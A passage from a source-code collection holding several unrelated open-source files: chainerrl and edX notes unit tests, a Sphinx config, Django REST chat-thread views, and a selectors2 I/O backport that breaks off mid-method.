vec_env = chainerrl.envs.SerialVectorEnv(
[make_env() for _ in range(self.num_envs)])
hook = mock.Mock()
chainerrl.experiments.train_agent_batch(
agent=agent,
env=vec_env,
steps=steps,
outdir=outdir,
max_episode_len=self.max_episode_len,
step_hooks=[hook],
)
iters = math.ceil(steps / self.num_envs)
self.assertEqual(agent.batch_act_and_train.call_count, iters)
self.assertEqual(agent.batch_observe_and_train.call_count, iters)
for env in vec_env.envs:
if self.max_episode_len is None:
if self.num_envs == 1:
if self.steps == 6:
# In the beginning and after 5 iterations
self.assertEqual(env.reset.call_count, 2)
else:
assert steps == 5
# Only in the beginning. While the last state is
# terminal, env.reset should not be called because
# training is complete.
self.assertEqual(env.reset.call_count, 1)
elif self.num_envs == 2:
# Only in the beginning
self.assertEqual(env.reset.call_count, 1)
else:
assert False
elif self.max_episode_len == 2:
if self.num_envs == 1:
# In the beginning, after 2 and 4 iterations
self.assertEqual(env.reset.call_count, 3)
elif self.num_envs == 2:
# In the beginning, after 2 iterations
self.assertEqual(env.reset.call_count, 2)
else:
assert False
self.assertEqual(env.step.call_count, iters)
if steps % self.num_envs == 0:
self.assertEqual(hook.call_count, steps)
else:
self.assertEqual(hook.call_count, self.num_envs * iters)
# A hook receives (env, agent, step)
for i, call in enumerate(hook.call_args_list):
args, kwargs = call
self.assertEqual(args[0], vec_env)
self.assertEqual(args[1], agent)
# step starts with 1
self.assertEqual(args[2], i + 1)
class TestTrainAgentBatchNeedsReset(unittest.TestCase):
def test_needs_reset(self):
steps = 10
outdir = tempfile.mkdtemp()
agent = mock.Mock()
agent.batch_act_and_train.side_effect = [[1, 1]] * 5
def make_env(idx):
env = mock.Mock()
if idx == 0:
# First episode: 0 -> 1 -> 2 -> 3 (reset)
# Second episode: 4 -> 5 -> 6 -> 7 (done)
env.reset.side_effect = [('state', 0), ('state', 4)]
env.step.side_effect = [
(('state', 1), 0, False, {}),
(('state', 2), 0, False, {}),
(('state', 3), 0, False, {'needs_reset': True}),
(('state', 5), -0.5, False, {}),
(('state', 6), 0, False, {}),
(('state', 7), 1, True, {}),
]
else:
# First episode: 0 -> 1 (reset)
# Second episode: 2 -> 3 (reset)
# Third episode: 4 -> 5 -> 6 -> 7 (done)
env.reset.side_effect = [
('state', 0), ('state', 2), ('state', 4)]
env.step.side_effect = [
(('state', 1), 0, False, {'needs_reset': True}),
(('state', 3), 0, False, {'needs_reset': True}),
(('state', 5), -0.5, False, {}),
(('state', 6), 0, False, {}),
(('state', 7), 1, True, {}),
]
return env
vec_env = chainerrl.envs.SerialVectorEnv(
[make_env(i) for i in range(2)])
chainerrl.experiments.train_agent_batch(
agent=agent,
env=vec_env,
steps=steps,
outdir=outdir,
)
self.assertEqual(vec_env.envs[0].reset.call_count, 2)
self.assertEqual(vec_env.envs[0].step.call_count, 5)
self.assertEqual(vec_env.envs[1].reset.call_count, 3)
self.assertEqual(vec_env.envs[1].step.call_count, 5)
|
mit
|
motion2015/edx-platform
|
lms/djangoapps/notes/tests.py
|
129
|
16454
|
"""
Unit tests for the notes app.
"""
from mock import patch, Mock
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from django.test import TestCase, RequestFactory
from django.test.client import Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
import json
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from courseware.tabs import get_course_tab_list, CourseTab
from student.tests.factories import UserFactory, CourseEnrollmentFactory
from notes import utils, api, models
class UtilsTest(ModuleStoreTestCase):
""" Tests for the notes utils. """
def setUp(self):
'''
Setup a dummy course-like object with a tabs field that can be
accessed via attribute lookup.
'''
super(UtilsTest, self).setUp()
self.course = CourseFactory.create()
def test_notes_not_enabled(self):
'''
Tests that notes are disabled when the course tab configuration does NOT
contain a tab with type "notes."
'''
self.assertFalse(utils.notes_enabled_for_course(self.course))
def test_notes_enabled(self):
'''
Tests that notes are enabled when the course tab configuration contains
a tab with type "notes."
'''
with self.settings(FEATURES={'ENABLE_STUDENT_NOTES': True}):
self.course.advanced_modules = ["notes"]
self.assertTrue(utils.notes_enabled_for_course(self.course))
class CourseTabTest(ModuleStoreTestCase):
"""
Test that the course tab shows up the way we expect.
"""
def setUp(self):
'''
Setup a dummy course-like object with a tabs field that can be
accessed via attribute lookup.
'''
super(CourseTabTest, self).setUp()
self.course = CourseFactory.create()
self.user = UserFactory()
CourseEnrollmentFactory.create(user=self.user, course_id=self.course.id)
def enable_notes(self):
"""Enable notes and add the tab to the course."""
self.course.tabs.append(CourseTab.load("notes"))
self.course.advanced_modules = ["notes"]
def has_notes_tab(self, course, user):
""" Returns true if the current course and user have a notes tab, false otherwise. """
request = RequestFactory().request()
request.user = user
all_tabs = get_course_tab_list(request, course)
return any([tab.name == u'My Notes' for tab in all_tabs])
def test_course_tab_not_visible(self):
# module not enabled in the course
self.assertFalse(self.has_notes_tab(self.course, self.user))
with self.settings(FEATURES={'ENABLE_STUDENT_NOTES': False}):
# setting not enabled and the module is not enabled
self.assertFalse(self.has_notes_tab(self.course, self.user))
# module is enabled and the setting is not enabled
self.course.advanced_modules = ["notes"]
self.assertFalse(self.has_notes_tab(self.course, self.user))
def test_course_tab_visible(self):
self.enable_notes()
self.assertTrue(self.has_notes_tab(self.course, self.user))
self.course.advanced_modules = []
self.assertFalse(self.has_notes_tab(self.course, self.user))
class ApiTest(TestCase):
def setUp(self):
super(ApiTest, self).setUp()
self.client = Client()
# Mocks
patcher = patch.object(api, 'api_enabled', Mock(return_value=True))
patcher.start()
self.addCleanup(patcher.stop)
# Create two accounts
self.password = 'abc'
self.student = User.objects.create_user('student', '[email protected]', self.password)
self.student2 = User.objects.create_user('student2', '[email protected]', self.password)
self.instructor = User.objects.create_user('instructor', '[email protected]', self.password)
self.course_key = SlashSeparatedCourseKey('HarvardX', 'CB22x', 'The_Ancient_Greek_Hero')
self.note = {
'user': self.student,
'course_id': self.course_key,
'uri': '/',
'text': 'foo',
'quote': 'bar',
'range_start': 0,
'range_start_offset': 0,
'range_end': 100,
'range_end_offset': 0,
'tags': 'a,b,c'
}
# Make sure no note with this ID ever exists for testing purposes
self.NOTE_ID_DOES_NOT_EXIST = 99999
def login(self, as_student=None):
username = None
password = self.password
if as_student is None:
username = self.student.username
else:
username = as_student.username
self.client.login(username=username, password=password)
def url(self, name, args={}):
args.update({'course_id': self.course_key.to_deprecated_string()})
return reverse(name, kwargs=args)
def create_notes(self, num_notes, create=True):
notes = []
for n in range(num_notes):
note = models.Note(**self.note)
if create:
note.save()
notes.append(note)
return notes
def test_root(self):
self.login()
resp = self.client.get(self.url('notes_api_root'))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertEqual(set(('name', 'version')), set(content.keys()))
self.assertIsInstance(content['version'], int)
self.assertEqual(content['name'], 'Notes API')
def test_index_empty(self):
self.login()
resp = self.client.get(self.url('notes_api_notes'))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertEqual(len(content), 0)
def test_index_with_notes(self):
num_notes = 3
self.login()
self.create_notes(num_notes)
resp = self.client.get(self.url('notes_api_notes'))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertIsInstance(content, list)
self.assertEqual(len(content), num_notes)
def test_index_max_notes(self):
self.login()
MAX_LIMIT = api.API_SETTINGS.get('MAX_NOTE_LIMIT')
num_notes = MAX_LIMIT + 1
self.create_notes(num_notes)
resp = self.client.get(self.url('notes_api_notes'))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertIsInstance(content, list)
self.assertEqual(len(content), MAX_LIMIT)
def test_create_note(self):
self.login()
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note_dict = notes[0].as_dict()
excluded_fields = ['id', 'user_id', 'created', 'updated']
note = dict([(k, v) for k, v in note_dict.items() if k not in excluded_fields])
resp = self.client.post(self.url('notes_api_notes'),
json.dumps(note),
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 303)
self.assertEqual(len(resp.content), 0)
def test_create_empty_notes(self):
self.login()
for empty_test in [None, [], '']:
resp = self.client.post(self.url('notes_api_notes'),
json.dumps(empty_test),
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 400)
def test_create_note_missing_ranges(self):
self.login()
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note_dict = notes[0].as_dict()
excluded_fields = ['id', 'user_id', 'created', 'updated'] + ['ranges']
note = dict([(k, v) for k, v in note_dict.items() if k not in excluded_fields])
resp = self.client.post(self.url('notes_api_notes'),
json.dumps(note),
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 400)
def test_read_note(self):
self.login()
notes = self.create_notes(3)
self.assertEqual(len(notes), 3)
for note in notes:
resp = self.client.get(self.url('notes_api_note', {'note_id': note.pk}))
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
self.assertEqual(content['id'], note.pk)
self.assertEqual(content['user_id'], note.user_id)
def test_note_doesnt_exist_to_read(self):
self.login()
resp = self.client.get(self.url('notes_api_note', {
'note_id': self.NOTE_ID_DOES_NOT_EXIST
}))
self.assertEqual(resp.status_code, 404)
self.assertEqual(resp.content, '')
def test_student_doesnt_have_permission_to_read_note(self):
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note = notes[0]
# set the student id to a different student (not the one that created the notes)
self.login(as_student=self.student2)
resp = self.client.get(self.url('notes_api_note', {'note_id': note.pk}))
self.assertEqual(resp.status_code, 403)
self.assertEqual(resp.content, '')
def test_delete_note(self):
self.login()
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note = notes[0]
resp = self.client.delete(self.url('notes_api_note', {
'note_id': note.pk
}))
self.assertEqual(resp.status_code, 204)
self.assertEqual(resp.content, '')
with self.assertRaises(models.Note.DoesNotExist):
models.Note.objects.get(pk=note.pk)
def test_note_does_not_exist_to_delete(self):
self.login()
resp = self.client.delete(self.url('notes_api_note', {
'note_id': self.NOTE_ID_DOES_NOT_EXIST
}))
self.assertEqual(resp.status_code, 404)
self.assertEqual(resp.content, '')
def test_student_doesnt_have_permission_to_delete_note(self):
notes = self.create_notes(1)
self.assertEqual(len(notes), 1)
note = notes[0]
self.login(as_student=self.student2)
resp = self.client.delete(self.url('notes_api_note', {
'note_id': note.pk
}))
self.assertEqual(resp.status_code, 403)
self.assertEqual(resp.content, '')
try:
models.Note.objects.get(pk=note.pk)
except models.Note.DoesNotExist:
self.fail('note should exist and not be deleted because the student does not have permission to do so')
def test_update_note(self):
notes = self.create_notes(1)
note = notes[0]
updated_dict = note.as_dict()
updated_dict.update({
'text': 'itchy and scratchy',
'tags': ['simpsons', 'cartoons', 'animation']
})
self.login()
resp = self.client.put(self.url('notes_api_note', {'note_id': note.pk}),
json.dumps(updated_dict),
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 303)
self.assertEqual(resp.content, '')
actual = models.Note.objects.get(pk=note.pk)
actual_dict = actual.as_dict()
for field in ['text', 'tags']:
self.assertEqual(actual_dict[field], updated_dict[field])
def test_search_note_params(self):
self.login()
total = 3
notes = self.create_notes(total)
invalid_uri = ''.join([note.uri for note in notes])
tests = [{'limit': 0, 'offset': 0, 'expected_rows': total},
{'limit': 0, 'offset': 2, 'expected_rows': total - 2},
{'limit': 0, 'offset': total, 'expected_rows': 0},
{'limit': 1, 'offset': 0, 'expected_rows': 1},
{'limit': 2, 'offset': 0, 'expected_rows': 2},
{'limit': total, 'offset': 2, 'expected_rows': 1},
{'limit': total, 'offset': total, 'expected_rows': 0},
{'limit': total + 1, 'offset': total + 1, 'expected_rows': 0},
{'limit': total + 1, 'offset': 0, 'expected_rows': total},
{'limit': 0, 'offset': 0, 'uri': invalid_uri, 'expected_rows': 0, 'expected_total': 0}]
for test in tests:
params = dict([(k, str(test[k]))
for k in ('limit', 'offset', 'uri')
if k in test])
resp = self.client.get(self.url('notes_api_search'),
params,
content_type='application/json',
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(resp.content, '')
content = json.loads(resp.content)
for expected_key in ('total', 'rows'):
self.assertTrue(expected_key in content)
if 'expected_total' in test:
self.assertEqual(content['total'], test['expected_total'])
else:
self.assertEqual(content['total'], total)
self.assertEqual(len(content['rows']), test['expected_rows'])
for row in content['rows']:
self.assertTrue('id' in row)
class NoteTest(TestCase):
def setUp(self):
super(NoteTest, self).setUp()
self.password = 'abc'
self.student = User.objects.create_user('student', '[email protected]', self.password)
self.course_key = SlashSeparatedCourseKey('HarvardX', 'CB22x', 'The_Ancient_Greek_Hero')
self.note = {
'user': self.student,
'course_id': self.course_key,
'uri': '/',
'text': 'foo',
'quote': 'bar',
'range_start': 0,
'range_start_offset': 0,
'range_end': 100,
'range_end_offset': 0,
'tags': 'a,b,c'
}
def test_clean_valid_note(self):
reference_note = models.Note(**self.note)
body = reference_note.as_dict()
note = models.Note(course_id=self.course_key, user=self.student)
try:
note.clean(json.dumps(body))
self.assertEqual(note.uri, body['uri'])
self.assertEqual(note.text, body['text'])
self.assertEqual(note.quote, body['quote'])
self.assertEqual(note.range_start, body['ranges'][0]['start'])
self.assertEqual(note.range_start_offset, body['ranges'][0]['startOffset'])
self.assertEqual(note.range_end, body['ranges'][0]['end'])
self.assertEqual(note.range_end_offset, body['ranges'][0]['endOffset'])
self.assertEqual(note.tags, ','.join(body['tags']))
except ValidationError:
self.fail('a valid note should not raise an exception')
def test_clean_invalid_note(self):
note = models.Note(course_id=self.course_key, user=self.student)
for empty_type in (None, '', 0, []):
with self.assertRaises(ValidationError):
note.clean(empty_type)
with self.assertRaises(ValidationError):
note.clean(json.dumps({
'text': 'foo',
'quote': 'bar',
'ranges': [{} for i in range(10)] # too many ranges
}))
def test_as_dict(self):
note = models.Note(course_id=self.course_key, user=self.student)
d = note.as_dict()
self.assertNotIsInstance(d, basestring)
self.assertEqual(d['user_id'], self.student.id)
self.assertTrue('course_id' not in d)
|
agpl-3.0
|
varunarya10/oslo.middleware
|
doc/source/conf.py
|
4
|
2462
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'oslosphinx'
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'oslo.middleware'
copyright = u'2014, OpenStack Foundation'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
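# Not part of the original file: with a configuration like the above, the HTML
# docs are typically built from the repository root with something like
#   sphinx-build -b html doc/source doc/build/html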
|
apache-2.0
|
olegpshenichniy/truechat
|
server/api/thread/views.py
|
1
|
2146
|
from rest_framework import generics
from rest_framework.exceptions import PermissionDenied
from .models import PrivateThread, GroupThread
from .serializers import PrivateThreadListCreateSerializer, PrivateThreadRetrieveDestroySerializer
from .serializers import GroupThreadListCreateSerializer, GroupThreadRetrieveUpdateDestroySerializer
#########################
##### PrivateThread #####
#########################
class PrivateThreadListCreateAPIView(generics.ListCreateAPIView):
model = PrivateThread
serializer_class = PrivateThreadListCreateSerializer
filter_fields = ('initiator',)
def get_queryset(self):
return PrivateThread.objects.filter(participants=self.request.user)
class PrivateThreadRetrieveDestroyAPIView(generics.RetrieveDestroyAPIView):
model = PrivateThread
serializer_class = PrivateThreadRetrieveDestroySerializer
def get_queryset(self):
return PrivateThread.objects.filter(participants=self.request.user)
def delete(self, request, *args, **kwargs):
# only participant can delete
if request.user not in self.get_object().participants.all():
raise PermissionDenied()
return super(PrivateThreadRetrieveDestroyAPIView, self).delete(request, *args, **kwargs)
#######################
##### GroupThread #####
#######################
class GroupThreadListCreateAPIView(generics.ListCreateAPIView):
model = GroupThread
serializer_class = GroupThreadListCreateSerializer
def get_queryset(self):
return GroupThread.objects.filter(participants=self.request.user)
class GroupThreadRetrieveUpdateDestroyAPIView(generics.RetrieveUpdateDestroyAPIView):
model = GroupThread
serializer_class = GroupThreadRetrieveUpdateDestroySerializer
def get_queryset(self):
return GroupThread.objects.filter(participants=self.request.user)
def delete(self, request, *args, **kwargs):
# only owner can delete
if request.user != self.get_object().owner:
raise PermissionDenied()
return super(GroupThreadRetrieveUpdateDestroyAPIView, self).delete(request, *args, **kwargs)
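# Minimal wiring sketch (not part of the original file): the route paths and
# URL names below are hypothetical; only the .as_view() hookup is standard
# Django REST framework usage.
#
# from django.conf.urls import url
# urlpatterns = [
#     url(r'^private-threads/$',
#         PrivateThreadListCreateAPIView.as_view(), name='private-thread-list'),
#     url(r'^private-threads/(?P<pk>\d+)/$',
#         PrivateThreadRetrieveDestroyAPIView.as_view(), name='private-thread-detail'),
# ]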
|
mit
|
dgarros/ansible
|
lib/ansible/compat/selectors/_selectors2.py
|
124
|
24265
|
# This file is from the selectors2.py package. It backports the PSF Licensed
# selectors module from the Python-3.5 stdlib to older versions of Python.
# The author, Seth Michael Larson, dual licenses his modifications under the
# PSF License and MIT License:
# https://github.com/SethMichaelLarson/selectors2#license
#
# Seth's copy of the MIT license is reproduced below
#
# MIT License
#
# Copyright (c) 2016 Seth Michael Larson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Backport of selectors.py from Python 3.5+ to support Python < 3.4
# Also has the behavior specified in PEP 475 which is to retry syscalls
# in the case of an EINTR error. This module is required because selectors34
# does not follow this behavior and instead returns that no file descriptor
# events have occurred rather than retry the syscall. The decision to drop
# support for select.devpoll is made to maintain 100% test coverage.
import errno
import math
import select
import socket
import sys
import time
from collections import namedtuple, Mapping
try:
monotonic = time.monotonic
except (AttributeError, ImportError): # Python < 3.3
monotonic = time.time
__author__ = 'Seth Michael Larson'
__email__ = '[email protected]'
__version__ = '1.1.0'
__license__ = 'MIT'
__all__ = [
'EVENT_READ',
'EVENT_WRITE',
'SelectorError',
'SelectorKey',
'DefaultSelector'
]
EVENT_READ = (1 << 0)
EVENT_WRITE = (1 << 1)
HAS_SELECT = True # Variable that shows whether the platform has a selector.
_SYSCALL_SENTINEL = object() # Sentinel in case a system call returns None.
class SelectorError(Exception):
def __init__(self, errcode):
super(SelectorError, self).__init__()
self.errno = errcode
def __repr__(self):
return "<SelectorError errno={0}>".format(self.errno)
def __str__(self):
return self.__repr__()
def _fileobj_to_fd(fileobj):
""" Return a file descriptor from a file object. If
given an integer will simply return that integer back. """
if isinstance(fileobj, int):
fd = fileobj
else:
try:
fd = int(fileobj.fileno())
except (AttributeError, TypeError, ValueError):
raise ValueError("Invalid file object: {0!r}".format(fileobj))
if fd < 0:
raise ValueError("Invalid file descriptor: {0}".format(fd))
return fd
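# Quick illustration (not in the original module) of _fileobj_to_fd:
# integers pass straight through, objects exposing fileno() are converted,
# and anything else raises ValueError.
#
# assert _fileobj_to_fd(7) == 7
# s = socket.socket()
# assert _fileobj_to_fd(s) == s.fileno()
# s.close()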
# Python 3.5 uses a more direct route to wrap system calls to increase speed.
if sys.version_info >= (3, 5):
def _syscall_wrapper(func, _, *args, **kwargs):
""" This is the short-circuit version of the below logic
because in Python 3.5+ all selectors restart system calls. """
try:
return func(*args, **kwargs)
except (OSError, IOError, select.error) as e:
errcode = None
if hasattr(e, "errno"):
errcode = e.errno
elif hasattr(e, "args"):
errcode = e.args[0]
raise SelectorError(errcode)
else:
def _syscall_wrapper(func, recalc_timeout, *args, **kwargs):
""" Wrapper function for syscalls that could fail due to EINTR.
All functions should be retried if there is time left in the timeout
in accordance with PEP 475. """
timeout = kwargs.get("timeout", None)
if timeout is None:
expires = None
recalc_timeout = False
else:
timeout = float(timeout)
if timeout < 0.0: # Timeout less than 0 treated as no timeout.
expires = None
else:
expires = monotonic() + timeout
args = list(args)
if recalc_timeout and "timeout" not in kwargs:
raise ValueError(
"Timeout must be in args or kwargs to be recalculated")
result = _SYSCALL_SENTINEL
while result is _SYSCALL_SENTINEL:
try:
result = func(*args, **kwargs)
# OSError is thrown by select.select
# IOError is thrown by select.epoll.poll
# select.error is thrown by select.poll.poll
# Aren't we thankful for Python 3.x rework for exceptions?
except (OSError, IOError, select.error) as e:
# select.error wasn't a subclass of OSError in the past.
errcode = None
if hasattr(e, "errno"):
errcode = e.errno
elif hasattr(e, "args"):
errcode = e.args[0]
# Also test for the Windows equivalent of EINTR.
is_interrupt = (errcode == errno.EINTR or (hasattr(errno, "WSAEINTR") and
errcode == errno.WSAEINTR))
if is_interrupt:
if expires is not None:
current_time = monotonic()
if current_time > expires:
raise OSError(errno.ETIMEDOUT, 'Connection timed out')
if recalc_timeout:
if "timeout" in kwargs:
kwargs["timeout"] = expires - current_time
continue
if errcode:
raise SelectorError(errcode)
else:
raise
return result
SelectorKey = namedtuple('SelectorKey', ['fileobj', 'fd', 'events', 'data'])
class _SelectorMapping(Mapping):
""" Mapping of file objects to selector keys """
def __init__(self, selector):
self._selector = selector
def __len__(self):
return len(self._selector._fd_to_key)
def __getitem__(self, fileobj):
try:
fd = self._selector._fileobj_lookup(fileobj)
return self._selector._fd_to_key[fd]
except KeyError:
raise KeyError("{0!r} is not registered.".format(fileobj))
def __iter__(self):
return iter(self._selector._fd_to_key)
class BaseSelector(object):
""" Abstract Selector class
A selector supports registering file objects to be monitored
for specific I/O events.
A file object is a file descriptor or any object with a
`fileno()` method. An arbitrary object can be attached to the
file object which can be used for example to store context info,
a callback, etc.
A selector can use various implementations (select(), poll(), epoll(),
and kqueue()) depending on the platform. The 'DefaultSelector' class uses
the most efficient implementation for the current platform.
"""
def __init__(self):
# Maps file descriptors to keys.
self._fd_to_key = {}
# Read-only mapping returned by get_map()
self._map = _SelectorMapping(self)
def _fileobj_lookup(self, fileobj):
""" Return a file descriptor from a file object.
This wraps _fileobj_to_fd() to do an exhaustive
search in case the object is invalid but we still
have it in our map. Used by unregister() so we can
unregister an object that was previously registered
even if it is closed. It is also used by _SelectorMapping
"""
try:
return _fileobj_to_fd(fileobj)
except ValueError:
# Search through all our mapped keys.
for key in self._fd_to_key.values():
if key.fileobj is fileobj:
return key.fd
# Raise ValueError after all.
raise
def register(self, fileobj, events, data=None):
""" Register a file object for a set of events to monitor. """
if (not events) or (events & ~(EVENT_READ | EVENT_WRITE)):
raise ValueError("Invalid events: {0!r}".format(events))
key = SelectorKey(fileobj, self._fileobj_lookup(fileobj), events, data)
if key.fd in self._fd_to_key:
raise KeyError("{0!r} (FD {1}) is already registered"
.format(fileobj, key.fd))
self._fd_to_key[key.fd] = key
return key
def unregister(self, fileobj):
""" Unregister a file object from being monitored. """
try:
key = self._fd_to_key.pop(self._fileobj_lookup(fileobj))
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
# Getting the fileno of a closed socket on Windows errors with EBADF.
except socket.error as err:
if err.errno != errno.EBADF:
raise
else:
for key in self._fd_to_key.values():
if key.fileobj is fileobj:
self._fd_to_key.pop(key.fd)
break
else:
raise KeyError("{0!r} is not registered".format(fileobj))
return key
def modify(self, fileobj, events, data=None):
""" Change a registered file object monitored events and data. """
# NOTE: Some subclasses optimize this operation even further.
try:
key = self._fd_to_key[self._fileobj_lookup(fileobj)]
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
if events != key.events:
self.unregister(fileobj)
key = self.register(fileobj, events, data)
elif data != key.data:
# Use a shortcut to update the data.
key = key._replace(data=data)
self._fd_to_key[key.fd] = key
return key
def select(self, timeout=None):
""" Perform the actual selection until some monitored file objects
are ready or the timeout expires. """
raise NotImplementedError()
def close(self):
""" Close the selector. This must be called to ensure that all
underlying resources are freed. """
self._fd_to_key.clear()
self._map = None
def get_key(self, fileobj):
""" Return the key associated with a registered file object. """
mapping = self.get_map()
if mapping is None:
raise RuntimeError("Selector is closed")
try:
return mapping[fileobj]
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
def get_map(self):
""" Return a mapping of file objects to selector keys """
return self._map
def _key_from_fd(self, fd):
""" Return the key associated to a given file descriptor
Return None if it is not found. """
try:
return self._fd_to_key[fd]
except KeyError:
return None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# Almost all platforms have select.select()
if hasattr(select, "select"):
class SelectSelector(BaseSelector):
""" Select-based selector. """
def __init__(self):
super(SelectSelector, self).__init__()
self._readers = set()
self._writers = set()
def register(self, fileobj, events, data=None):
key = super(SelectSelector, self).register(fileobj, events, data)
if events & EVENT_READ:
self._readers.add(key.fd)
if events & EVENT_WRITE:
self._writers.add(key.fd)
return key
def unregister(self, fileobj):
key = super(SelectSelector, self).unregister(fileobj)
self._readers.discard(key.fd)
self._writers.discard(key.fd)
return key
def _select(self, r, w, timeout=None):
""" Wrapper for select.select because timeout is a positional arg """
return select.select(r, w, [], timeout)
def select(self, timeout=None):
# Selecting on empty lists on Windows errors out.
if not len(self._readers) and not len(self._writers):
return []
timeout = None if timeout is None else max(timeout, 0.0)
ready = []
r, w, _ = _syscall_wrapper(self._select, True, self._readers,
self._writers, timeout)
r = set(r)
w = set(w)
for fd in r | w:
events = 0
if fd in r:
events |= EVENT_READ
if fd in w:
events |= EVENT_WRITE
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
__all__.append('SelectSelector')
if hasattr(select, "poll"):
class PollSelector(BaseSelector):
""" Poll-based selector """
def __init__(self):
super(PollSelector, self).__init__()
self._poll = select.poll()
def register(self, fileobj, events, data=None):
key = super(PollSelector, self).register(fileobj, events, data)
event_mask = 0
if events & EVENT_READ:
event_mask |= select.POLLIN
if events & EVENT_WRITE:
event_mask |= select.POLLOUT
self._poll.register(key.fd, event_mask)
return key
def unregister(self, fileobj):
key = super(PollSelector, self).unregister(fileobj)
self._poll.unregister(key.fd)
return key
def _wrap_poll(self, timeout=None):
""" Wrapper function for select.poll.poll() so that
_syscall_wrapper can work with only seconds. """
if timeout is not None:
if timeout <= 0:
timeout = 0
else:
# select.poll.poll() has a resolution of 1 millisecond,
# round away from zero to wait *at least* timeout seconds.
timeout = math.ceil(timeout * 1e3)
result = self._poll.poll(timeout)
return result
def select(self, timeout=None):
ready = []
fd_events = _syscall_wrapper(self._wrap_poll, True, timeout=timeout)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.POLLIN:
events |= EVENT_WRITE
if event_mask & ~select.POLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
__all__.append('PollSelector')
if hasattr(select, "epoll"):
class EpollSelector(BaseSelector):
""" Epoll-based selector """
def __init__(self):
super(EpollSelector, self).__init__()
self._epoll = select.epoll()
def fileno(self):
return self._epoll.fileno()
def register(self, fileobj, events, data=None):
key = super(EpollSelector, self).register(fileobj, events, data)
events_mask = 0
if events & EVENT_READ:
events_mask |= select.EPOLLIN
if events & EVENT_WRITE:
events_mask |= select.EPOLLOUT
_syscall_wrapper(self._epoll.register, False, key.fd, events_mask)
return key
def unregister(self, fileobj):
key = super(EpollSelector, self).unregister(fileobj)
try:
_syscall_wrapper(self._epoll.unregister, False, key.fd)
except SelectorError:
# This can occur when the fd was closed since it was registered.
pass
return key
def select(self, timeout=None):
if timeout is not None:
if timeout <= 0:
